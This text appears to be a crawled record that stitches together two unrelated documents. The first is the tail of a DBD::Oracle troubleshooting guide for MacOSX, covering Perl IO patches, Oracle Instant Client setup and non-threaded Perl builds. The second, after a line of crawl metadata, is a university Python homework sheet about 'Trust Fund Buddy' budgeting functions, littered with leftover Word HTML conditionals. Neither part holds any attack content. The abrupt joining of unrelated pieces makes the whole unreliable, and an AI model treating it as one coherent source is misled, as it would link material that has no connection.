POLL_EVENTS_MASK (POLL_CAN_READ | POLL_CAN_WRITE | POLL_HAS_EXCP) int ! poll(fds, nfds, timeout) struct pollfd *fds; unsigned long nfds; int timeout; --- 35,41 ---- # define POLL_EVENTS_MASK (POLL_CAN_READ | POLL_CAN_WRITE | POLL_HAS_EXCP) int ! io_poll(fds, nfds, timeout) struct pollfd *fds; unsigned long nfds; int timeout; diff -c ../IO-orig/IO-1.20/poll.h ./poll.h *** ../IO-orig/IO-1.20/poll.h Wed Apr 15 20:33:02 1998 --- ./poll.h Sat May 10 14:29:11 2003 *************** *** 44,50 **** #define POLLHUP 0x0010 #define POLLNVAL 0x0020 ! int poll _((struct pollfd *, unsigned long, int)); #ifndef HAS_POLL # define HAS_POLL --- 44,50 ---- #define POLLHUP 0x0010 #define POLLNVAL 0x0020 ! int io_poll _((struct pollfd *, unsigned long, int)); #ifndef HAS_POLL # define HAS_POLL +=+=+=+=+=+=+= Cut to the previous line - compile and install as you usually would, making sure that existing but conflicting modules get removed: $ perl Makefile.PL $ make $ make test $ make install UNINST=1 - You are done. Continue with 3).
3) Install the module DBI as per its instructions, if you haven't already done so.
4) Install the DBD::Oracle module.
$ perl Makefile.PL $ make $ make test $ make install
Instructions for 10.3.x (Panther)
I highly recommend you install and use the Oracle 10g Instant Client for MacOSX 10.3. Compared to traditional Oracle client installations it is a very compact download, and it has the memory leak problem fixed. As an added benefit, you will be able to seamlessly connect to 10g databases. Even if you do want to run the database server included in the 9iR2 Developer's Release, I'd still use the Instant Client for compiling OCI applications or drivers like DBD::Oracle.
If you still decide to use the full 9iR2 DR client, and if all you use DBD::Oracle for on MacOSX is development and test scripts that don't involve running the same query multiple times or many queries within the same perl process, then note that the memory leak will most likely never affect you in a serious way. In this case you may not need to bother and instead just go ahead, build and install DBD::Oracle straightforwardly without any special measures.
That said, here are the details.
0) (If you decided for the 9iR2 DR client, skip to 1.) If you decided to use the 10g Instant Client, make sure you download and install all parts. (Given that this is perl land you may not need the JDBC driver, but why bother sorting out the 25% you may or may not ever need.) Follow the Oracle instructions and copy the contents of each part into the same destination directory. Change to this destination directory and create a symlink lib pointing to '.' (without the quotes):
$ cd </path/to/my/oracle/instantclient> $ ln -s lib . Also, set the environment variable ORACLE_HOME to the path to your instantclient destination directory. Makefile.PL needs it. Now return to your DBD::Oracle download. If the version is 1.16 or less you will need to patch Makefile.PL; in later versions this may be fixed already. Apply the following patch, e.g., by cutting and pasting into a file Makefile.PL.patch and then executing $ patch -p0 < Makefile.PL.patch Here is the patch: +=+=+=+=+=+=+= Cut after this line *** Makefile.PL.orig Fri Oct 22 02:07:04 2004 --- Makefile.PL Fri May 13 14:28:53 2005 *************** *** 1252,1257 **** --- 1252,1258 ---- print "Found $dir/$_\n" if $::opt_d; }, "$OH/rdbms", "$OH/plsql", # oratypes.h sometimes here (eg HPUX 11.23 Itanium Oracle 9.2.0) + "$OH/sdk", # Oracle Instant Client default location (10g) ); @h_dir = keys %h_dir; print "Found header files in @h_dir.\n" if @h_dir; *************** *** 1286,1292 **** --- 1287,1297 ---- open FH, ">define.sql" or warn "Can't create define.sql: $!"; print FH "DEFINE _SQLPLUS_RELEASE\nQUIT\n"; close FH; + # we need to temporarily disable login sql scripts + my $sqlpath = $ENV{SQLPATH}; + delete $ENV{SQLPATH}; my $sqlplus_release = `$sqlplus_exe -S /nolog \@define.sql 2>&1`; + $ENV{SQLPATH} = $sqlpath if $sqlpath; unlink "define.sql"; print $sqlplus_release; if ($sqlplus_release =~ /^DEFINE _SQLPLUS_RELEASE = "(\d?\d)(\d\d)(\d\d)(\d\d)(\d\d)"/) { +=+=+=+=+=+=+= Cut to the previous line The first hunk allows Makefile.PL to find the header files which are in a subdirectory sdk, and the second temporarily disables any global and local login.sql scripts which may make the sqlplus call fail. If you don't have a local login.sql script you will most likely be fine without the second hunk. Now run Makefile.PL and make sure you provide the -l flag: $ perl Makefile.PL -l If you receive some ugly error message stating that some *.mk file couldn't be found you forgot to add the -l flag. The continue the standard build process by running make. In DBD::Oracle versions 1.16 and earlier this will end in an error due to a failed execution of nmedit -R. Ignore this error. Move on to running the tests, making sure the test scripts can log in to your database (e.g., by setting ORACLE_USERID). Note that by default the Instant Client does not have a network/admin/tnsnames.ora installed. Either install a suitable one, or point TNS_ADMIN to the directory where you keep your tnsnames.ora, or include the full SQLNET connection string in ORACLE_USERID. All three options are documented by Oracle in the README_IC.htm file that comes with the Instant Client, so be sure you read it if you don't understand what I'm writing here. All tests should succeed. Complete by make install. You are done! Skip the other steps below, they do NOT apply to the Instant Client. (Although of course you may still install a later version of perl if you have the need.)
1) Until the reason for the memory leak has been found and fixed, you need to remove the condition that exposes it. Apparently, this is multi-threading being enabled in Perl. The Perl 5.8.1RC3 that comes with Panther was compiled with multi-threading enabled, and AFAIK it cannot be turned off at runtime. Note that the problem is independent of whether you run multiple concurrent threads or not.
Therefore, the solution is to build your own perl. I leave it up to you whether you want to replace the system perl or not. At least Perl 5.8.x comes with instructions as to how to replace the system perl on MacOS X, and what the caveats and risks are. I used 5.8.4, installed in /usr/local, and it worked perfectly fine. The key when configuring your custom build of perl is to disable multi-threading (usethreads, useithreads, and usemultiplicity options). More precisely, do not enable them, as they are disabled by default, at least up to version 5.8.5. You can check whether threads are enabled or not by passing -V to ther Perl interpreter: $ /path/to/your/perl -V | grep usethreads You need to see a line saying, among other things, usethreads=undef. If you see usethreads=define then multi-threading is enabled.
2) If you choose not to replace the system perl, make sure that when you build DBI and DBD::Oracle you provide the full path to your own perl when running Makefile.PL, like so (assuming you installed in /usr/local, which is the default):
$ /usr/local/bin/perl Makefile.PL Also, every time you run a DBD::Oracle script, you must use the full path too, unless your custom-built perl comes before the system perl in the PATH environment. The easiest way to ensure you are using the right perl is to uninstall DBI from the system perl if you did install it under that as well.
3) Continue with 3) as in instructions for Jaguar (making path substitutions for perl as discussed in 2). ======================================================================
If you have any problems then follow the instructions in the README. Please post details of any problems (or changes you needed to make) to [email protected] and CC them to [email protected] on MacOSX specific problems. Rewrite of part of this readme, Panther instructions, and the Perl IO patch is credit to Hilmar Lapp, hlapp at gmx.net.
Earlier and original instructions thanks to: Andy Lester Steve Sapovits Tom Mornini
Date: Tue, 15 Apr 2003 16:02:17 +1000 Subject: Compilation bug in DBI on OSX with threaded Perl 5.8.0 From: Danial Pearce
In regards to a previous message on this list:
I have some more info:
I have compiled and installed Perl just fine with threads enabled:
./Configure -de -Dusethreads -Dprefix=/usr make make test sudo make install
I have then successfully installed Apache and mod_perl as well.
When I try to compile and install DBI, I get a bus error, just like the people on this list have previously discussed on the thread above.
If I unpack the DBI, and run perl Makefile.pl, then alter the created Makefile so that it uses gcc2 rather than just "cc" then it compiles, installs and runs just fine.
The issue here is that Apple have just recently release 10.2.4, which updates /usr/bin/{gcc3,gcc2,g++3,g++2} and /usr/bin/cc is a symlink to /usr/bin/gcc3, so compilation of DBI under Apple's gcc3 does not work. It works find with gcc2 however.
I had the same problem with DBD::Pg, and was able to compile and install that using the same fix.
I am unsure if this is a problem with Apple's version of gcc, or a problem with the DBI/DBD code itself. Given that all my other open source applications are compiling and installing fine, I am thinking there isn't anything Apple are going to do about it.
cheers Dan. | https://metacpan.org/pod/DBD::Oracle::Troubleshooting::Macos | CC-MAIN-2015-40 | refinedweb | 3,420 | 66.54 |
CS 302 Computer
Fluency
Elaine Rich
<![if !supportLineBreakNewLine]>
<![endif]>
Trust Fund Buddy
Our Python book, in Chapter 2, introduces two Trust Fund Buddy programs. For this project, we are going to make our own versions of those programs. We are going to make some changes to what the programs actually do. But, also, to make it easy for you to turn in everything you do in one module, we are going to define callable functions that perform the Trust Fund Buddy actions.
Part I
The first Trust Fund Buddy program is introduced on page 39.
<![if !supportLists]>1. <![endif]>Start by creating your own module that contains the program trust_fund_bad from the book. That program has 8 categories of expenses. Maybe your taste doesn’t run to Lamborghinis. So change the program so that it uses 8 budget categories that reflect how you would spend the trust fund money if it were yours.
<![if !supportLists]>2. <![endif]>Run the program. See if you can figure out why it gets the wrong answer.
<![if !supportLists]>3. <![endif]>Convert your code to a callable function named trust_fund_bad. See below for how to do that.
<![if !supportLists]>4. <![endif]>Call your function to make sure that it works as you expect (namely incorrectly).
Part II
The second Trust Fund Buddy program is introduced on page 41.
<![if !supportLists]>1. <![endif]>In the same module, create a new function called trust_fund_good. Start with the body of your function using the code from trust_fund_good from the book. But again there are the old 8 categories of expenses. So change this second function so that it uses the budget categories you chose for Part I.
<![if !supportLists]>2. <![endif]>Call your function to make sure it works correctly.
Part III
Your rich grandfather may have set you up with a trust but he’s also given you a mean trustee who is determined to limit your expenses. He’s asked you for a budget and told you to list 20 budget categories, in descending order of how badly you want them. But he is going to decide how many of them you’re going to get. You are guaranteed that he’ll pick a number between 2 and 20.
<![if !supportLists]>1. <![endif]>In the same module, create a new function called trust_fund_monthly. Here’s its outline:
def trust_fund_monthly(n):
"""Will let you have your top n ways of spending money."""
# fantasies is a list of money spending opportunities.
# damages is a matching list of dollar amounts.
fantasies = 20 * [""] # Before we start to fantasize.
damages = 20 * [0] # These just create the lists.
# Now fill in the values.
fantasies[0] = "Extreme sports"
damages[0] = 10000
fantasies[1] = "truffles"
damages[1] = 5000
## fill in 2 through 19
## print a list of the n allowable fantasies
## print the monthly total of the allowable fantasies
You should fill in the three sections marked with ##. In other words, you need to make your function do the following three things:
<![if !supportLists]>a. <![endif]>Fill in the lists fantasies and damages.
<![if !supportLists]>b. <![endif]>Print a list of the n allowable fantasies. (Hint: use a loop.)
<![if !supportLists]>c. <![endif]>Print the monthly total of the allowable fantasies. (Hint: use another loop.) Make sure to label this number as the monthly total.
<![if !supportLists]>2. <![endif]>Call your function to make sure it works correctly.
Part IV
One month is bad enough. What about a whole year?
<![if !supportLists]>1. <![endif]>In the same module, create a new function called trust_fund_annual. It should work exactly the same as trust_fund_monthly except:
<![if !supportLists]>· <![endif]>After it prints the list of n allowable fantasies, its next output line should report the annual total (assuming that spending stays the same every month).
<![if !supportLists]>· <![endif]>It should have a final line that reports the difference between your annual spending and that of a small island country Beachland (whose annual spending is $846,678,754). If your spending is less than that of Beachland, your program should output:
You spent <amount> less than Beachland this year. Congratulations on not wasting money!
If your spending is more than that of Beachland, your program should output:
You spent <amount> more than Beachland this year. Congratulations on becoming an island nation!
If your spending is exactly equal to that of Beachland, your program should output:
You spent <amount> exactly the same amount as Beachland this year. Congratulations on becoming an island nation!
To create this line, you will need to use an if statement, as described starting on p. 53. Remember that, to check for equality, use == not simply = (which is used only as the assignment operator). Because you are considering three cases, you will probably want to use elif, which is described starting on p. 59.
Turning in Your Project
Use the turnin system to submit a single module with the four functions that you have written.
Defining a Function
The process of defining functions is described in the book starting on p. 161. Suppose that you have written the following code:
x = 3
y = 6
print(x+y)
To turn this code into a function that you can call, you first need to choose a name. Let’s call our function xy. Then we write:
def xy():
x = 3
y = 6
print(x+y)
You can cut and paste your original code to put in your function. But remember that it must be indented one level. There are tools to do this automatically, but for short functions, the easiest thing to do is just to insert four blanks at the beginning of every line. | http://www.cs.utexas.edu/~ear/cs302/Homeworks/TrustFundBuddy.html | CC-MAIN-2017-04 | refinedweb | 938 | 73.98 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.